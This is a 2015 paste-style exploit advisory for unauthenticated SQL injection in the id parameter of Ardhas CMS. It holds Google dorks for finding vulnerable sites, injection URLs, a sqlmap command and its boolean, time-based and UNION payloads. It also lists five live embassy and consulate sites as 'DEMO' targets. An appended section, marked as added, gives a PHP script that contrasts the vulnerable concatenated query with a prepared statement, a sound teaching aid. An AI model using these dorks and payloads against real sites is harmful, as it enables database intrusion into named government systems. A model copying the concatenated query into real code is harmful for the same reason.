
INDIAN EMBASSY Ardhas CMS - SQL Injection Vulnerability

a guest Oct 27th, 2015 528 Never
=========================================================
[+] Title                 :- INDIAN EMBASSY Ardhas CMS - SQL INJECTION
[+] Date                  :- 26 - October - 2015
[+] Vendor Homepage       :- http://www.ardhas.com/
[+] Version               :- All Versions
[+] Tested on             :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category              :- webapps
[+] Google Dorks          :- "Powered by: Ardhas Technology India Private Limited."
                             "Powered by: Ardhas Technology India Private Limited." inurl:"php?id="
                             "Powered by: Ardhas Technology India Private Limited." +inurl:/.php?id=
[+] Exploit Author        :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name             :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website      :- serverfarming.com, intelligentexploit.com
[+] The official Members  :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to             :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact               :- indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com

=========================================================
[+] Severity Level          :- High

[+] Request Method(s)       :- GET / POST

[+] Vulnerable Parameter(s) :- id

[+] Affected Area(s)        :- Entire admin, database, Server

[+] About                   :- Unauthenticated SQL injection via multiple PHP files, causing an SQL error

[+] SQL vulnerable File     :- /home/DOMAIN/public_html/pages.php

[+] POC                     :- http://127.0.0.1/pages.php?id=[SQL]'

The SQL injection web vulnerability can be exploited by remote attackers without any privileged web-application user account and without user interaction.


http://www.[WEBSITE].com/pages.php?id=73' order by [SQL INJECTION]--+
http://www.[WEBSITE].com/pages.php?id=73' union all select [SQL INJECTION]--+


SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/pages.php?id=[SQL]" --dbs
++++++++++++++++++++++++++
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=73' AND 1443=1443 AND 'jAQh'='jAQh

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=73' AND (SELECT * FROM (SELECT(SLEEP(5)))plvi) AND 'AdNh'='AdNh

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=-5334' UNION ALL SELECT CONCAT(0x7171786271,0x48674266657370705958,0x717a766a71)--
---


[+] DEMO :-   http://www.indianembassy.at/pages.php?id=73'
              https://www.hcisingapore.gov.in/support.php?id=ocp'
              http://www.indembassysuriname.com/pages.php?id=87'
              http://www.cgimunich.com/pages.php?id=35'
              http://www.indianembassy.am/pages.php?id=35'


=======================================================
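
Added example (not part of the original paste and not Ardhas code): the advisory does not show the source of pages.php, so the concatenated query below is an assumed reconstruction of the flaw in the id parameter, set beside a bound-parameter version. Table, column and function names are hypothetical, and in-memory SQLite stands in for MySQL so the script runs offline.

```php
<?php
// Added example: hypothetical reconstruction of a pages.php-style lookup.
// Schema and function names are assumptions; the rows are constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE pages (id TEXT PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO pages VALUES ('73', 'Visa services'), ('ocp', 'Support')");

// Vulnerable pattern: id is concatenated into the statement, so a quote in
// the value ends the string literal and the remainder is parsed as SQL.
function lookup_concatenated(PDO $db, $id)
{
    $sql = "SELECT title FROM pages WHERE id = '" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: allow-list the id format first (defence in depth), then
// bind the value so it travels separately from the statement text.
function lookup_prepared(PDO $db, $id)
{
    if (!is_string($id) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $id)) {
        return array(); // reject instead of passing it to the database
    }
    $stmt = $db->prepare("SELECT title FROM pages WHERE id = :id");
    $stmt->execute(array(':id' => $id));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Run one lookup and summarise the outcome, including database errors.
function describe($fn, PDO $db, $id)
{
    try {
        return count(call_user_func($fn, $db, $id)) . ' row(s)';
    } catch (PDOException $e) {
        return 'SQL error';
    }
}

// Inputs: a normal id, the trailing-quote form from the POC line, and the
// boolean-based payload from the sqlmap output in the advisory.
$inputs = array("73", "73'", "73' AND 1443=1443 AND 'jAQh'='jAQh");

foreach ($inputs as $id) {
    printf("%-38s concatenated: %-10s prepared: %s\n", $id,
        describe('lookup_concatenated', $db, $id),
        describe('lookup_prepared', $db, $id));
}
```

With the concatenated query, the trailing quote produces a database error and the boolean payload still returns the page row, which is the behaviour the advisory and the sqlmap output describe; the prepared version returns no rows for either input.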